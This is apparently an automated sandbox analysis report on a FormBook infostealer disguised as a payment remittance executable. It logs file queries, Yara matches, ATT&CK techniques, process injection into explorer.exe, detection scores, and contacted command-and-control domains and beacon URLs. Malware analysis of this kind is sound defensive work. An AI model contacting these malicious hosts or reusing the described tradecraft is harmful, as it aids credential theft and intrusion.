          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Masquerading1 | Input Capture1 | Security Software Discovery221 | Remote Services | Input Capture1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion31 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection512 | NTDS | Application Window Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | - | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information1 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information4 | Cached Domain Credentials | System Information Discovery112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 483527 | Sample: Electronic Payment Remittan... | Startdate: 15/09/2021 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.pasalsacongress.com; pasalsacongress.com; www.moominmamalog.com
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
            -> started: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                 Dropped file: Electronic Payment...65011119889.exe.log, ASCII
                 -> started: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                      -> injected: explorer.exe
                           DNS/IP: 198.54.117.211, 49784, 80 NAMECHEAP-NETUS United States; v3lala99.cdnddd.net 103.15.104.66, 49785, 80 GIGABIT-MYGigabitHostingSdnBhdMY Malaysia; 9 other IPs or domains
                           Signatures: System process connects to network (likely due to code injection or exploit)
                           -> started: raserver.exe
                                Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                -> started: cmd.exe
                                     -> started: conhost.exe
                           -> started: autoconv.exe

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | 28% | Virustotal | -
          Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | 57% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun
          Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          pasalsacongress.com | 192.185.52.175 | true | true | - | unknown
          parkingpage.namecheap.com | 198.54.117.215 | true | false | - | high
          www.johnharrisagent.com | 52.71.133.130 | true | false | - | high
          v3lala99.cdnddd.net | 103.15.104.66 | true | true | - | unknown
          www.moominmamalog.com | 183.181.96.104 | true | false | - | unknown
          www.yummyblockparty.com | unknown | unknown | true | - | unknown
          www.hide.osaka | unknown | unknown | true | - | unknown
          www.pasalsacongress.com | unknown | unknown | true | - | unknown
          www.fitotec.net | unknown | unknown | true | - | unknown
          www.btt5204.com | unknown | unknown | true | - | unknown
          www.itsready.support | unknown | unknown | true | - | unknown

                                Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.fasilitatortoefl.com/uytf/ | true | Avira URL Cloud: safe | low
          http://www.btt5204.com/uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc | true | Avira URL Cloud: safe | unknown
          http://www.itsready.support/uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc | true | Avira URL Cloud: safe | unknown
          http://www.johnharrisagent.com/uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc | false | - | high

                                  URLs from Memory and Binaries

                                                      • Avira URL Cloud: safe
                                                      unknown
